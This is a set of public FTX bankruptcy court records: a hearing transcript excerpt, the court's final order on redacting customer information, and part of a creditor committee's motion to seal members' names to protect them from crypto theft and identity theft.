2          MR. HANSEN:  Your Honor, Kris Hansen with Paul

3    Hastings, on behalf of the Committee.

4          Just quickly, to address the one point that

5    Ms. Sarkessian raised regarding 107(c), we do believe those

6    issues are real and to the extent that the Court wanted to

7    hear further evidence with respect to 107(c), we would ask

8    for a continuance of the hearing on that basis, so that we

9    could come back and provide more robust information to you.

10   It would consist of information that's available from a

11   public perspective, so newspaper articles, et cetera, that

12   you could take judicial notice of, but we, also, would

13   probably seek to put witnesses on, as well, to talk about

14   what has happened with respect to criminal and other type of

15   activity within the crypto space.

16         I don't know, today, whether we would be able to

17   link that to the disclosure of a name from a bankruptcy case,

18   but I think we could link it to disclosure of names,

19   otherwise, that people are able to find out through social

20   media and other avenues.  But I wanted to make sure the Court

21   understood, procedurally, where from the Committee stands, if

22   you need information and more information on 107(c), we would

23   like to have a continuance on that basis.

24         We think the record is very clear on 107(b) that

25   you have what you need in order to grant the relief that the

**A0158**

1   with Paul Hastings on behalf of the Committee.

2           Your Honor, with respect to the individual

3   creditor names that are on the Committee, the notice that the

4   U.S. Trustee filed for individuals does not include their

5   addresses or their information; it just has their names.  For

6   the institutions, it obviously includes their addresses.

7           So, when the debtors make their disclosure with

8   respect to the top 50 for those parties, we would ask,

9   consistent with the notice that was filed from the U.S.

10  Trustee, with respect to their appointment, that we do

11  maintain that information under seal.

12          THE COURT:  Is that an issue?

13          MS. SARKESSIAN:  The U.S. Trustee has no

14  objection.  We're in complete agreement.

15          THE COURT:  Okay.  Thank you.

16          Anyone else?

17      (No verbal response)

18          THE COURT:  All right.  Well, this case certainly

19  presents extraordinary circumstances just by the nature of

20  the case itself.  The fact that we have a list of people who

21  may be customers, may be creditors, may be both, and I don't

22  know who -- which is which, and they are -- there are nine

23  million of them, I'm reluctant at this point to say I'm going

24  to require the disclosure.

25          I think the debtor did put on sufficient evidence

**A0159**

 1  to show that customer lists -- and I think it goes without

 2  saying that a customer list in any bankruptcy case is

 3  something that is protected by 107(b) as a trade secret.

 4  Companies hold those things very closely and don't want them

 5  disclosed.

 6          The difficulty here is I don't know who's a

 7  customer and who's not, who's just a regular creditor.  So,

 8  at this point, I'm going to overrule the objections and allow

 9  them to remained sealed at this point, but I'm not going to

10  leave it open for six months.  I'm going to -- I would

11  approve an order that extended it for three months.  By then,

12  I think, based on the testimony and the arguments of counsel,

13  we'll have a better sense of whether or not the customer

14  lists is something that purchasers of these assets find value

15  in and whether they are interested in making sure that they

16  remain anonymous at this point.

17          On the 107(c) issue, as I already indicated, I do

18  want more on that because I do want to make sure I'm

19  protections the interests of these individuals.  And it's

20  interesting, because if you look at 107(a) and -- or excuse

21  me -- 107(c), it refers to protecting information and

22  refer -- and -- excuse me -- in defining what identification

23  means, it refers to the Criminal Code 18 -- Title 18,

24  Section 128(d).  And if you look at 128(d), it says that the

25  information includes names, numbers, or any combination of

1   those two that would allow the identification of an

2   individual.  So, certainly, the Criminal Code recognizes that

3   disclosure of a name could result in the identification of an

4   individual and if that individual needs protecting, we need

5   to make sure that that is happening.

6          I don't have enough on the record today to say

7   that 107(c) applies, but I want to make sure that I'm doing

8   the right thing.  So, I will, in connection with any

9   further -- I guess the question, then, is do I hold that

10  hearing before the three months is up?  And I think in order

11  to make sure that we have a fulsome record and that the

12  parties have the opportunity to engage in discovery, if

13  necessary, to identify people who might come in and testify,

14  I want to make sure that they have the opportunity.  So,

15  we'll schedule a further hearing on the 107(c), in connection

16  with the 107(b) follow-up in three months.

17         I do want to make sure that the debtors are, in

18  compiling the nine million names, if there is a way to

19  identify them if they are just a creditor and not a customer,

20  I expect that to be done.  And I would like to have a status

21  conference on that question, alone, within the next -- I

22  think we have another hearing scheduled on the 20th.  So,

23  let's have a status conference on the 20th on the question of

24  how difficult it would be for the debtors to provide a list

25  of creditors and/or customers and distinguish between

**A0161**

1                        CERTIFICATION

2          We certify that the foregoing is a correct

3    transcript from the electronic sound recording of the

4    proceedings in the above-entitled matter to the best of our

5    knowledge and ability.

6

7    /s/ William J. Garling                January 12, 2023

8    William J. Garling, CET-543

9    Certified Court Transcriptionist

10   For Reliable

11

12   /s/ Tracey J. Williams                January 12, 2023

13   Tracey J. Williams, CET-914

14   Certified Court Transcriptionist

15   For Reliable

16

17   /s/ Mary Zajaczkowski                 January 12, 2023

18   Mary Zajaczkowski, CET-531

19   Certified Court Transcriptionist

20   For Reliable

21

22   /s/ Coleen Rand                       January 12, 2023

23   Coleen Rand, CET-341

24   Certified Court Transcriptionist

25   For Reliable

## IN THE UNITED STATES BANKRUPTCY COURT
## FOR THE DISTRICT OF DELAWARE

| | |
|---|---|
| In re: | Chapter 11 |
| FTX TRADING LTD., *et al.*,[1] | Case No. 22-11068 (JTD) |
| Debtors. | (Jointly Administered) |
| | **Ref. Nos. 45, 157 & 539** |

### FINAL ORDER (I) AUTHORIZING THE DEBTORS TO MAINTAIN A CONSOLIDATED LIST OF CREDITORS IN LIEU OF SUBMITTING A SEPARATE MATRIX FOR EACH DEBTOR, (II) AUTHORIZING THE DEBTORS TO REDACT OR WITHHOLD CERTAIN CONFIDENTIAL INFORMATION OF CUSTOMERS AND PERSONAL INFORMATION OF INDIVIDUALS ON A FINAL BASIS AND (III) GRANTING CERTAIN RELATED RELIEF

Upon the motion (the "Motion")[2] of FTX Trading Ltd. and its affiliated debtors

and debtors-in-possession (collectively, the "Debtors"), for entry of an order (this "Final Order")

(a) authorizing the Debtors to (i) maintain the Creditor Matrix in lieu of submitting a separate

creditor matrix for each Debtor and (ii) redact or withhold certain confidential information of

customers and personal information of individuals, (b) establishing procedures for notifying the

parties of the commencement of these Chapter 11 Cases and (c) granting related relief; and this

Court having entered the *Interim Order (I) Authorizing the Debtors to Maintain A Consolidated*

*List of Creditors in Lieu of Submitting a Separate Matrix for Each Debtor, (II) Authorizing the*

*Debtors to Redact or Withhold Certain Confidential Information of Customers and Personal*

*Information of Individuals on an Interim Basis and (III) Granting Certain Related Relief* [D.I.

157]; and this Court having jurisdiction to consider the Motion pursuant to 28 U.S.C. §§ 157 and

---

[1]     The last four digits of FTX Trading Ltd.'s and Alameda Research LLC's tax identification number are 3288 and 4063 respectively.  Due to the large number of debtor entities in these Chapter 11 Cases, a complete list of the Debtors and the last four digits of their federal tax identification numbers is not provided herein.  A complete list of such information may be obtained on the website of the Debtors' claims and noticing agent at https://cases.ra.kroll.com/FTX.

[2]     Capitalized terms not otherwise defined herein are to be given the meanings ascribed to them in the Motion.

## A0163

1334 and the *Amended Standing Order of Reference* from the United States District Court for the

District of Delaware, dated February 29, 2012; and this Court being able to issue a final order

consistent with Article III of the United States Constitution; and venue of these Chapter 11 Cases

and the Motion in this district being proper pursuant to 28 U.S.C. §§ 1408 and 1409; and this

matter being a core proceeding pursuant to 28 U.S.C. § 157(b); and this Court having found that

proper and adequate notice of the Motion and the relief requested therein has been provided in

accordance with the Bankruptcy Rules and the Local Rules, and that, except as otherwise ordered

herein, no other or further notice is necessary; and objections (if any) to the Motion having been

withdrawn, resolved or overruled on the merits; and a hearing having been held to consider the

relief requested in the Motion and upon the record of the hearing and all of the proceedings had

before this Court; and this Court having found and determined that the relief set forth in this

Order is in the best interests of the Debtors, their estates, and their creditors; and that the legal

and factual bases set forth in the Motion establish just cause for the relief granted herein; and

after due deliberation and sufficient cause appearing therefor;

   IT IS HEREBY ORDERED THAT:

  1.  The Motion is GRANTED on a final basis as set forth herein.

  2.  The requirements of Local Rules 1007(a)(2) and 2002-1(f)(v) that separate

mailing matrices be submitted for each Debtor are waived, and the Debtors are authorized to

submit a consolidated list of creditors; *provided* that if any of these Chapter 11 Cases converts to

a case under chapter 7 of the Bankruptcy Code, the applicable Debtor shall file its own creditor

mailing matrix.

4863-0907-8079 v.5

3.      The Debtors shall cause the consolidated Creditor Matrix to be made available in readable electronic format (or in non-electronic format at such requesting party's sole cost and expense) upon reasonable request by parties-in-interest.

4.      The Debtors are authorized, on a final basis, pursuant to section 107(b)(1) of the Bankruptcy Code, to redact the names, addresses and e-mail address of their customers from any filings with the Court or made publicly available in these Chapter 11 Cases, *provided, however*, that the authorization to redact the names of all customers, and to redact the names, addresses and e-mail addresses of customers who are not natural persons, is only until the date that is 90 days from the date of the entry of this Order (such date, the "Redaction Deadline").

5.      The Debtors are authorized, on a final basis, to redact the addresses and e-mail addresses of their creditors and equity holders who are natural persons from any filings with the Court or made publicly available in these Chapter 11 Cases.

6.      The Debtors are authorized, on a final basis, to redact the names, addresses and e-mail address of any creditors or equity holders who are natural persons and who are protected by the GDPR, from any filings with the Court or made publicly available in these Chapter 11 Cases; *provided, however*, that the authorization to redact the names of creditors or equity holders who are natural persons and are protected by the GDPR is only until the Redaction Deadline.

7.      The rights of the Debtors, the Official Committee of Unsecured Creditors, and all other parties in interest to seek an extension of the Redaction Deadline, or to request authorization to redact any personal information of customers, creditors or equity holders on any other grounds, are reserved.

8.    For the absence of doubt, the Debtors shall file unredacted versions of any papers redacted pursuant to this Final Order under seal with the Court in accordance with the Local Rules.

9.    Notwithstanding anything to the contrary in the order relating to the retention of a claims agent, or any Local Rules or Bankruptcy Rules, the Claims and Noticing Agent is authorized, on a final basis, to (a) suppress from the Claims Register (i) the names, addresses and e-mail addresses of the Debtors' customers until the Redaction Deadline, (ii) the names, addresses and e-mail addresses of any other creditors or equity holders who are natural persons and who are protected by the GDPR until the Redaction Deadline and (iii) the addresses and e-mail addresses of the Debtors' customers who are natural persons, and of other creditors or equity holders who are natural persons, before and after the Redaction Deadline, (b) file affidavits of service redacting the (i) the names, addresses and e-mail addresses of the Debtors' customers until the Redaction Deadline, (ii) the names, addresses and e-mail addresses of any other individual creditors or individual equity holders who are protected by the GDPR until the Redaction Deadline and (iii) the addresses and e-mail addresses of the Debtors' customers who are natural persons, and of other creditors or equity holders who are natural persons, before and after the Redaction Deadline, and (c) withhold publication of proofs of claims filed by customers until the Redaction Deadline, *provided* that the Claims and Noticing Agent shall serve the Debtors' customers and creditors at their actual addresses and e-mail addresses.

10.    The Debtors shall refile their Consolidated Lists of Top 50 Creditors filed at D.I. 51 and 162 without redacting the name of any creditor who was appointed by the U.S. Trustee to the Official Committee of Unsecured Creditors, and without redacting of the address,

-4-

**A0166**

e-mail address or phone numbers of any creditor who is not natural persons and was appointed by the U.S. Trustee to the Official Committee of Unsecured Creditors.

11.     The Debtors shall provide an unredacted Creditor Matrix, unredacted Consolidated Top 50 Creditor List, unredacted Schedules and Statements, an unredacted Claims Register, unredacted affidavits of service, withheld proofs of claim, and any other filings redacted pursuant to this Final Order, to (a) upon request, the U.S. Trustee, the U.S. Department of Justice, counsel to the U.S. Securities and Exchange Commission, counsel to state governmental agencies of the State of Texas, and any trustee, examiner and official committee appointed in these Chapter 11 Cases and (b) upon further order of the Court, any other party.

12.     Upon request of a party in interest, the Court may, upon a showing of good cause, release some or all of the information that is being redacted pursuant to the authority granted by this Final Order.  All parties' rights in this regard are reserved.

13.     To the extent a party in interest files a document on the docket in these Chapter 11 Cases that is required to be served on creditors whose information is under seal pursuant to this Final Order, such party in interest should contact counsel for the Debtors who shall work in good faith, with the assistance of their Claims and Noticing Agent, to effectuate the service on such party's behalf.

14.     Nothing in this Final Order prohibits any customer, creditor or equity holder from voluntarily identifying itself in connection with these Chapter 11 Cases, or voluntarily disclosing any of their contact information.  In addition, nothing in this Final Order exempts any customer, creditor or equity holder from compliance with Rule 2019 of the Federal Rules of Bankruptcy Procedure.

15.     The Debtors are authorized and empowered to execute and deliver such documents, and to take and perform all actions necessary to implement and effectuate the relief granted in this Final Order.

16.     This Court shall retain jurisdiction with respect to any matters, claims, rights or disputes arising from or related to the Motion or the implementation of this Final Order.

Dated: January 20th, 2023
Wilmington, Delaware

JOHN T. DORSEY
UNITED STATES BANKRUPTCY JUDGE

# IN THE UNITED STATES BANKRUPTCY COURT
# FOR THE DISTRICT OF DELAWARE

| | |
|---|---|
| In re<br><br>FTX TRADING LTD., *et al.*,<br><br>Debtors.[1] | Chapter 11<br><br>Case No. 22-11068-JTD<br><br>Jointly Administered<br><br>**Re: 1136**<br><br>**Objection Deadline:**<br>**April 5, 2023 at 4:00 p.m. (ET)**<br><br>**Hearing Date:**<br>**April 12, 2023 at 1:00 p.m. (ET)** |

**THE AD HOC COMMITTEE OF NON-US CUSTOMERS OF FTX.COM'S
MOTION TO FILE UNDER SEAL (I) THE VERIFIED STATEMENT OF
EVERSHEDS SUTHERLAND (US) LLP AND MORRIS, NICHOLS, ARSHT &
TUNNELL LLP PURSUANT TO BANKRUPTCY RULE 2019 AND (II) THE
DECLARATION IN SUPPORT OF THE AD HOC COMMITTEE OF NON-US
CUSTOMERS OF FTX.COM'S MOTION TO FILE UNDER SEAL THE VERIFIED
STATEMENT OF EVERSHEDS SUTHERLAND (US) LLP AND MORRIS,
NICHOLS, ARSHT & TUNNELL LLP PURSUANT TO BANKRUPTCY RULE 2019**

The Ad Hoc Committee of Non-US Customers of FTX.com (the "Ad Hoc Committee"), by

and through undersigned counsel, hereby files this motion (this "Motion") and respectfully states as

follows:

## RELIEF REQUESTED

1.     The Ad Hoc Committee requests entry of an order, substantially in the form

attached as **Exhibit A** (the "Proposed Order"), authorizing the Ad Hoc Committee to file under

seal portions of the Ad Hoc Committee's verified statement pursuant to rule 2019 (as may be

---

[1]     The last four digits of FTX Trading Ltd.'s and Alameda Research LLC's tax identification numbers
are 3288 and 4063 respectively.  Due to the large number of debtor entities in these Chapter 11
Cases (collectively, the "Debtors"), a complete list of the Debtors and the last four digits of their
federal tax identification numbers is not provided herein.  A complete list of such information may
be obtained on the website of the Debtors' claims and noticing agent at
https://cases.ra.kroll.com/FTX.

amended from time to time, the "Rule 2019 Statement") of the Federal Rules of Bankruptcy

Procedure (the "Bankruptcy Rules"), the *Declaration in Support of the Ad Hoc Committee of Non-US Customers of FTX.com's Motion to File Under Seal the Verified Statement of Eversheds Sutherland (US) LLP and Morris, Nichols, Arsht & Tunnell LLP Pursuant to Bankruptcy Rule 2019* (the "Member Declaration")[2] and any other filings (together with the Rule 2019 Statement and the Member Declaration, the "Sealed Filings") that contain:

> (i) the names of the Ad Hoc Committee's members that are individual, natural born persons (the "Personally Identifying Information"); and
>
> (ii) the names of the Ad Hoc Committee's members that are business entities (the "Entities") (the Entities' names together with the Personally Identifying Information, the "Sealed Information").[3]

2.      In support of this Motion, the Ad Hoc Committee relies on and incorporates by reference the *Declaration of Philip James in Support of the Ad Hoc Committee of Non-US Customers of FTX.com's Motion to File Under Seal the Verified Statement of Eversheds Sutherland (US) LLP and Morris, Nichols, Arsht & Tunnell LLP Pursuant to Bankruptcy Rule 2019* (the "Philips Declaration") and the Member Declaration.

## JURISDICTION AND BASIS FOR RELIEF

3.      This Court has jurisdiction to consider this Motion pursuant to 28 U.S.C. §§ 157 and 1334, and the *Amended Standing Order of Reference* from the United States District Court for

---

[2]     The Ad Hoc Committee is requesting that the Member Declaration be sealed in order to protect the identity of the declarant for the same reasons set forth herein.

[3]     If the Court denies any portion of the relief requested in this Motion, then the Ad Hoc Committee shall file a supplemental Rule 2019 Statement within 10 days of entry of an order denying the relief requested in this Motion. During the 10-day period, the Ad Hoc Committee will inform its Members of the Court's ruling and provide its Members with the opportunity to withdraw from the Ad Hoc Committee due to the denial of this Motion.

the District of Delaware dated as of February 29, 2012. This is a core proceeding under 28 U.S.C. § 157(b). Venue is proper before the Court pursuant to 28 U.S.C. §§ 1408 and 1409.

4.     The Ad Hoc Committee consents pursuant to rule 9013-1(f) of the Local Rules for the United States Bankruptcy Court for the District of Delaware (the "Local Rules") to the entry of a final order by the Court in connection with this Motion to the extent that it is later determined that the Court, absent consent of the parties, cannot enter final orders or judgments in connection herewith consistent with Article III of the United States Constitution.

5.     The statutory bases for the relief requested herein are sections 107(b) and 107(c) of title 11 of the United States Code (the "Bankruptcy Code"), as supplemented by Bankruptcy Rules 9018 and 9037 and Local Rules 9018-1(d) and 9037-1.

## BACKGROUND

6.     The Ad Hoc Committee is a collective group of FTX customers who hold accounts on the FTX.com platform. The Ad Hoc Committee currently has 27 members (each a "Member") serving in individual or representative capacities that together held over $2.0 billion in assets in their FTX.com customer accounts as of the Petition Date (defined below). The Members reside or operate in over a dozen countries across the world and range from small individual holders and investment funds to large institutional market makers and asset managers. While the Ad Hoc Committee is diverse in its composition, it is unified in its common objective of advancing the legal rights of FTX.com customers in these cases.

7.     On November 11, 2022, and November 14, 2022 (as applicable, the "Petition Date"), the Debtors commenced these chapter 11 cases by filing voluntary petitions with this Court under chapter 11 of the Bankruptcy Code.

**A0171**

8. On the Petition Date, the Debtors filed the *Motion of Debtors for Entry of Interim and Final Order (I) Authorizing the Debtors to Maintain a Consolidated List of Creditors in Lieu of Submitting a Separate Matrix for Each Debtor, (II) Authorizing the Debtors to Redact and Withhold Certain Confidential Information of Customers and Personal Information of Individuals and (III) Granting Certain Related Relief* [D.I. 45] (the "Redaction Motion"), requesting authority to, among other things, redact the names and addresses of the Debtors' customers from the Debtors' creditor matrix and other filings in these chapter 11 cases. This Court entered an order approving the Redaction Motion on an interim basis. [D.I. 157].

9. The Ad Hoc Committee filed a joinder in support of granting the Redaction Motion on a final basis. [D.I. 327].

10. On January 11, 2023, this Court held a hearing to consider approval of the Redaction Motion on a final basis (the "Second Day Hearing"). At the Second Day Hearing, the Court authorized the Debtors to continue to redact the names and addresses of customers for an additional three months. Jan. 11, 2023 Hr'g Tr. at 102:18–108:18. In reaching this decision, the Court ruled that the names of the Debtors' customers may remain sealed from public view pursuant to section 107(b) of the Bankruptcy Code because the customers' identities qualify as a "trade secret" of the Debtors. *Id.* at 102:25–103:5. The Court also commented that the names of the Debtors' individual customers are likely entitled to protection under section 107(c) of the Bankruptcy Code:

> On the 107(c) issue, as I already indicated, I do want more on that because I do want to make sure I'm protect[ing] the interests of these individuals. And it's interesting, because if you look at 107(c), it refers to protecting information and in defining what identification means, it refers to the Criminal Code 18 -- Title 18, Section 128(d). And if you look at 128(d), it says that the information includes names, numbers, or any combination of those two that would allow the identification of an individual. So, certainly, the Criminal Code

4

**A0172**

> recognizes that disclosure of a name could result in the identification of an individual and if that individual needs protecting, we need to make sure that that is happening.  I don't have enough on the record today to say that 107(c) applies, but I want to make sure that I'm doing the right thing.

*Id.* at 103:17–104:8.

11.    On January 20, 2023, the Court entered an order approving the Redaction Motion for an additional 90 days consistent with the Court's ruling at the Second Day Hearing [D.I. 545] (the "Redaction Order").  The Redaction Order provides that the names, addresses, and e-mail addresses for the Debtors' customers shall be redacted from any filings with the Court or made publicly available in the Debtors' chapter 11 cases, provided that the authorization to redact the names of the Debtors' customers "who are not natural persons" is only until April 20, 2023.  *Id.* at ¶ 4.  The Redaction Order only authorizes these redactions in filings by the Debtors—not any party in interest.  *Id.*

12.    Contemporaneously with this Motion, the Ad Hoc Committee filed the Rule 2019 Statement under seal.  Pursuant to Bankruptcy Rule 2019, the sealed version of the Rule 2019 Statement includes, among other information, the Members' names and addresses in these chapter 11 cases.  The Ad Hoc Committee has also filed the *Proposed Redacted Version of the Verified Statement of Eversheds Sutherland (US) LLP and Morris, Nichols, Arsht & Tunnell LLP Pursuant to Bankruptcy Rule 2019* (the "Redacted Rule 2019 Statement"), which includes redactions related only to the Sealed Information, but publicly discloses each Member's disclosable economic interest.[4]

---

[4]    Some Members have provided their disclosable economic interest in an estimated, aggregate dollarized amount because the Members have been unable to access their accounts and confirm their exact holdings due to the Debtors disabling access to the FTX.com platform.  To the extent that access or additional records become available and the Members can confirm their holdings, the Ad Hoc Committee will supplement the Rule 2019 Statement accordingly.

**A0173**

## **BASIS FOR RELIEF**

13.     In bankruptcy courts, the presumptive right to access documents filed in a federal court is codified in section 107(a) of the Bankruptcy Code, which provides that "a paper filed in a case under this title and the dockets of a bankruptcy court are public records and open to examination by an entity at reasonable times without charge."  11 U.S.C. § 107(a).  *See also In re Altegrity, Inc.*, No. 15-10226-LSS, 2015 WL 10963572, at *3 (Bankr. D. Del. 2015) (noting that in bankruptcy courts, the right of access is codified in section 107(a)).

14.     The right of public access, however, "is not absolute."  *In re Orion Pictures Corp.*, 21 F.3d 24, 27 (2d Cir. 1994) (internal citation omitted).  Section 107(b) of the Bankruptcy Code provides for exceptions to the rule and states that "the bankruptcy court shall . . . protect an entity with respect to a trade secret or confidential research, development or commercial information." 11 U.S.C. § 107(b).  Section 107(c) further provides that a bankruptcy court may, "for cause" protect an individual from disclosure of "any means of identification" if disclosure would create an "undue risk of identity theft or other unlawful injury."  *Id.* § 107(c).  Moreover, Bankruptcy Rule 9037(d) authorizes a bankruptcy court to redact "any additional information" for cause.  Fed. R. Bankr. P. 9037(d).

15.     The Court should authorize the Ad Hoc Committee to redact the Sealed Information from the Rule 2019 Statement for several reasons.  As an initial matter, the Court has already determined that the Members' identities, as customers of the Debtors, is confidential commercial information that should remain sealed pursuant to section 107(b).  In addition, the Personally Identifying Information should remain under seal because the individual Members' names are a "means of identification" under section 107(c) of the Bankruptcy Code, which, if disclosed, would subject the individual Members to undue risk of identity theft and other unlawful injury.  The

Personally Identifying Information should also remain under seal because it is protected by foreign data privacy laws. The Entities' names should likewise remain sealed because such names constitute "confidential commercial information" under section 107(b) of the Bankruptcy Code. Alternatively, cause exists to order the redaction of the Entities' names under Bankruptcy Rule 9037(d).

**A.** **The Redaction Order Authorizes Sealing the Identities of the Debtors' Customers, like the Ad Hoc Committee's Members, from Public View Because the Identities are Confidential Commercial Information.**

16. As an initial matter, the Court already determined at the Second Day Hearing that the names of the Debtors' customers qualify as a "trade secret" of the Debtors under section 107(b) and should remain sealed from public view. Jan. 11, 2023 Hr'g Tr. at 102:25–103:5.

17. As FTX.com customers, the Members' identities should remain sealed consistent with the Redaction Order. The Redaction Order authorizes the redaction of "the names, addresses and e-mail addresses of [the Debtors'] customers" from the Debtors' filings in these chapter 11 cases. Redaction Order at ¶ 4.

18. There is no basis to deny the Ad Hoc Committee the same relief that the Court has already granted to the Debtors—nor is there any reason to disturb the Court's prior holding as applied to the Members. The Court correctly found that the identities of the Debtors' customers qualify as a "trade secret." *Liveware Publishing, Inc., v. Best Software, Inc.*, 252 F.Supp.2d 74, 85 (D. Del. 2003) (customer list "is precisely the type of business information which is regularly accorded trade secret status"). To the extent that the Members' identities are publicly disclosed, the Debtors lose the value of such trade secret irrespective of the nature of disclosure. Accordingly, the Court should authorize the Ad Hoc Committee to redact the names of its Members from the Rule 2019 Statement.

**B.**     **Alternatively, the Personally Identifying Information Should Remain Sealed Pursuant to Section 107(c) Because Disclosure of the Individual Members' Names Will Expose the Members to Undue Risk of Identity Theft and Other Unlawful Injury.**

19.     Section 107(c)(1) of the Bankruptcy Code provides that:

> The bankruptcy court, for cause, may protect an individual, with respect to the following types of information to the extent the court finds that disclosure of such information would create **undue risk of identity theft or other unlawful injury** to the individual or the individual's property:
>
> (A) **Any** means of identification (as defined in section 1028(d) of title 18) contained in a paper filed, or to be filed, in a case under this title.
>
> (B) Other information contained in a paper described in subparagraph (A).

11 U.S.C. § 107(c)(1)(A)–(B) (emphasis added).

20.     Section 1028(d)(7) of title 18 of the United States Code defines "means of identification" as:

> any **name** or number **that may be used, alone** or in conjunction with any other information, **to identify a specific individual**, **including** any—
>
> (A) **name**, social security number, date of birth, official State or government issued driver's licenses or identification number, alien registration number, government passport number, employer or taxpayer identification number . . .

18 U.S.C. § 1028(d)(7)(A) (emphasis added).  The names of the individual Members are a means of identification for these Members, the disclosure of which would create an undue risk of identity theft *and* other unlawful injury.

### i. *Disclosing the Personally Identifying Information Inherently Creates an Undue Risk of Identity Theft.*

21.     Courts in this district and elsewhere routinely recognize that, absent any additional evidence, there is an inherent risk of identity theft that is increased by a compelled disclosure of

8

**A0176**

an individual's identifying information in bankruptcy filings.  For example, in *Endo International*, Judge Garrity took "judicial notice of the fact that identity theft is a worldwide problem" to justify redacting, among other information, the names, home addresses, and email addresses of individual litigation claimants from the debtor's public filings.  *In re Endo Int'l plc*, No. 22-22549-JLG, 2022 WL 16935997, at *10–12 (Bankr. S.D.N.Y. Nov. 14, 2022).

22.     Similarly, in *Art Van Furniture*, Judge Sontchi noted that the redaction of personally identifying information is not a "burden of proof" issue so "much as a common sense issue."  Hr'g Tr. at 25:6–7, *In re Art Van Furniture, LLC*, No. 20-10553 (CSS) (Bankr. D. Del. Mar. 10, 2020) [D.I. 82].  Judge Sontchi found that "at this point and given the risks associated with having any kind of private information out on the internet, [redaction] has really become routine [and] I think obvious relief."  *Id.* at 25:13–16; *see also In re Clover Techs. Grp., LLC*, Case No. 19-12680 (KBO) (Bankr. D. Del. Jan. 22, 2020) [D.I. 146] ("I don't need evidence that there is, at best, a risk of identity theft and worse a risk of personal injury from listing someone's name and address on the internet by way of the court's electronic case filing system and, of course, the claims agent's website . . . . The court can completely avoid contributing to the risk by redacting the [personally identifying information.]"); *In re Forever 21, Inc.*, Case No. 19-12122 (KG) (Bankr. D. Del. Dec. 19, 2019) [D.I. 605] (noting that "[w]e live in a new age in which the theft of personal identification is a real risk, as is injury to persons who, for personal reasons, seek to have their addresses withheld").  *But see In re Celsius Network LLC*, 644 B.R. 276 (Bankr. S.D.N.Y. 2022) (declining to authorize the debtors to redact the names of individual creditors under section 107(c)).

23.     Accordingly, like in *Endo International* and *Art Van Furniture*, the Court should authorize the Ad Hoc Committee to redact the Personally Identifying Information from the Rule

2019 Statement. To hold otherwise would subject the Members to an undue and unnecessary risk of identity theft in a modern era where victims of identity theft lose an estimated $17.5 billion per year.[5]

> ### ii. Due to the Unique Features of Cryptocurrency, Disclosing the Personally Identifying Information Creates an Undue Risk of Other Unlawful Injury to the Members.

24.    Moreover, the risks associated with disclosure of the Personally Identifying Information are not limited to identity theft. As the Member Declaration explains, customers of cryptocurrency exchanges are uniquely targeted by sophisticated criminals seeking to steal digital assets. Member Declaration at ¶ 6. Each aspect of a customer's identifying information poses serious risks due to the nature of digital assets. Once a transfer of a digital asset is initiated, it usually is unrecoverable. *Id.* at ¶ 5. As a result, digital assets are a frequent target of hacking—a successful hack that initiates a transfer of the target's digital assets is an effective form of online theft. *See* Member Declaration at ¶ 5 & 7.

25.    Every primary means of cryptocurrency theft would be made far easier to perpetrate if the Personally Identifying Information is made public. Philips Declaration ¶ 10. There are several common ways that thieves target cryptocurrency holders:

- **Stealing an Online Wallet.** The most common way to steal digital assets is by stealing a digital wallet. If a criminal knows that a person holds a wallet on a crypto exchange, as they would if the Personally Identifying Information is disclosed, then they will inevitably attempt a variety of means to access that wallet and steal the assets. Compelling the Ad Hoc Committee's Members to disclose the Personally Identifying Information to participate in these chapter 11 cases puts a bullseye on their digital assets for criminals to target. *Id.*

---

[5]    *See* Erika Harrell, *Victims of Identity Theft, 2016*, 2019 Bureau of Justice Statistics 1, https://www.bjs.gov/content/pub/pdf/vit16.pdf (estimating that 10% of persons 16 years of age and over reported being a victim of identity theft during a 12-month period, with total losses equaling $17.5 billion).

10

**A0178**

- **Theft of Private Keys.** A slightly more sophisticated customer can manage the private keys necessary to transact their cryptocurrency on the related blockchain in "hardware wallets." If the private keys are stolen, the wallet's contents can be emptied. A bad actor can use a Member's Personally Identifying Information and correlated additional information in a variety of ways to trick customers into surrendering their private keys, including phishing emails, phone calls, and phony donation requests. *Id.*

- **Physical Robbery.** Cryptocurrency holders have also been the victims of physical robbery. Holders can be forced to surrender hardware wallets, passwords, and other access credentials to online wallets. Sophisticated criminals easily determine the addresses of customers with only a name. Targeting of known holders of cryptocurrency to steal their wallets or keys is becoming increasingly common. In one notable case, an entrepreneur was targeted by masked robbers targeting his cryptocurrency, who physically tortured him to force him to reveal passwords to bank accounts and electronic wallets.[6] *Id.*

- **SIM Swapping.** "SIM swapping" occurs when a criminal gains access to a victim's cell phone account through an accomplice at a wireless provider. Because most providers of online wallets rely upon text messaging for security in password resets, a criminal who has obtained a SIM-swapped device can effortlessly take over any such online wallet. *Id.*

26. The mere fact that the Debtors have now disabled the FTX.com platform does little to mitigate these risks. By the Debtors' own admission, FTX.com wallets were hacked on the Petition Date, *after the Debtors froze withdrawals from the platform*, which resulted in an estimated $372 million loss. *See Declaration of John J. Ray III in Support of Chapter 11 Petitions and First Day Pleadings* [D.I. 24] ¶ 66. The Members remain subject to a risk of cryptocurrency theft notwithstanding the fact that the FTX.com platform is frozen. *See id.*

27. The unique risks that cryptocurrency customers face have manifested as a result of the *Celsius* decision. Cryptocurrency customers have suffered severe consequences resulting from the *Celsius* court's refusal to protect customer information contained in bankruptcy filings.

---

[6] *See, e.g.*, Zahra Tayeb, *An Entrepreneur Told Police He was Tortured for Several Hours by Masked Criminals Attempting to Steal His Bitcoin Millions*, Business Insider (Nov. 7, 2021), https://www.businessinsider.com/masked-robbers-attempted-to-steal-bitcoin-millions-from-entrepreneur-spain-2021-11.

Searchable lists of customers' names and their transaction histories were published on the internet shortly after the *Celsius* debtors made their creditor list public.[7]  Phishing scammers posed as debtors' counsel using fake email accounts from Kirkland & Ellis and requested that the customers reply with their account information.  *See* Notice of Phishing Attempts, *In re Celsius Network, LLC*, No. 22-10964-MG (Bankr. S.D.N.Y. Nov. 30, 2022) [D.I. 1527], attached hereto as **Exhibit B**.  The Philips Declaration, Member Declaration, and the fallout of the *Celsius* decision illustrate that Members would face significantly heightened risk of hacking, theft, harassment, and other unlawful injury due to the disclosure of the Personally Identifying Information.

### iii. Foreign Data Privacy Laws Require the Ad Hoc Committee to Protect the Personally Identifying Information.

28.     The Personally Identifying Information is also protected by foreign data privacy laws.  Some of the Ad Hoc Committee's individual Members are citizens of countries that have implemented the European Union's General Data Protection Regulation (the "GDPR"), including France, Portugal, and Poland.

